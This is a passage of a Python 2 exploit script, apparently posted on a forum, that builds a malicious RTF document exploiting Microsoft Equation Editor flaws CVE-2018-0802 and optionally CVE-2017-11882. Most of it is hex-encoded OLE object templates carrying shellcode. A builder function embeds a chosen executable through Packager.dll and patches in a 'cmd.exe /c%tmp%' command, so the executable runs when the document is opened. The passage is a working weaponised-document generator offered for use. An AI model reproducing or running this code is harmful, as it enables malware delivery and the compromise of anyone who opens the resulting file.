0000000000000000000000000000000000000000000000000000001400000000000000010043006F
006D0070004F0062006A000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000004000000FFFFFFFF0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFF
FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008
00000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFF01000002000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02
CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E
30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01
000000000000007C010000040100003C0100000100090000039E00000002001C0000000000050000
0009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000
000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFF
FFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB
0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F
2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C
00650050007200650073003000300030000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000180002000300000005000000FFFFFFFF0000000000
00000000000000000000000000000000000000000000000000000000000000040000007E01000000
0000005200690063006800450064006900740046006C006100670073000000000000000000000000
0000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FF
FFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A
0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065
000000000000000000000000000000000000000000000000000000000000000000000020000200FF
FFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000
000000000000000B000000C500000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000020000A00000026060F000A00FF
FFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D00
0048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100
000300000000000000000000000000000000000000000000004E414E490000000000000100000000
00000001000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4
EE5B0000000000030100030A0A08000133C0508D44245250EB7F2020202020202020202020202020
20202020202020202020202020202020202020202020202020202020202020202020202020202020
20202020202020202020202020202020202020202020202020202020202020202020202020202020
202020202020202020202020202020202020202020202020202020202020202026908B44242C662D
51A8FFE0250000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550
494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C000000
00000500000009020000000005000000020101000000050000000102FFFFFF00050000002E011800
0000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF00001000
0000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D6174685479706500002000
1C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00
FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A60011000030000002020
20000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC020000
00000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE218000400
00002D01010004000000F0010000030000000000
"""
OBJDATA_TEMPLATE_11882 = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006f
006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
414141414141414141414141414141414141414141120c4300000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000004500710075
006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
0000000000000000000000000000000000000000000000000000000000000004000000c500000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000ff
ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""
def create_ole_exec_primitive(command, objdata_template, command_offset, max_len):
if len(command) > max_len:
raise ValueError("primitive command must be shorter than %d bytes" % max_len)
hex_command = command.ljust(max_len).encode("hex")
objdata_hex_stream = objdata_template.translate(None, "\r\n")
ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):]
return OBJECT_HEADER + ole_data + OBJECT_TRAILER
def create_rtf(header, trailer, executable, double):
# CVE-2018-0802 exploit
ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126)
p = Package(executable)
package = p.build_package()
outbuf = header + package + ole1
if double:
# CVE-2017-11882 exploit
outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43)
return outbuf + trailer
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method")
parser.add_argument("-e", "--executable", help="File to ebmed and exec", required=True)
parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true")
args = parser.parse_args()
with open(args.output, 'w') as f:
f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double))
print "[+] Completed!"
Last edited by a moderator: